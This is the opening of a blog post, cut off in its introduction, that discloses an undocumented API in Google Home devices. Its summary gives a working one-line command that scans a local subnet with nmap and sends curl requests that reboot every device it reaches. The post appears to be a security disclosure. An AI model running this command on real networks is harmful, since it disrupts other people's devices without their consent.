Google Home (in)Security – JerryGamblin.comTL;DR: An undocumented API in Google home devices is easily exploitable. This command will reboot any on your local network: nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://%:8008/setup/reboot Introduction I have always been a fan of Google Products, so when they
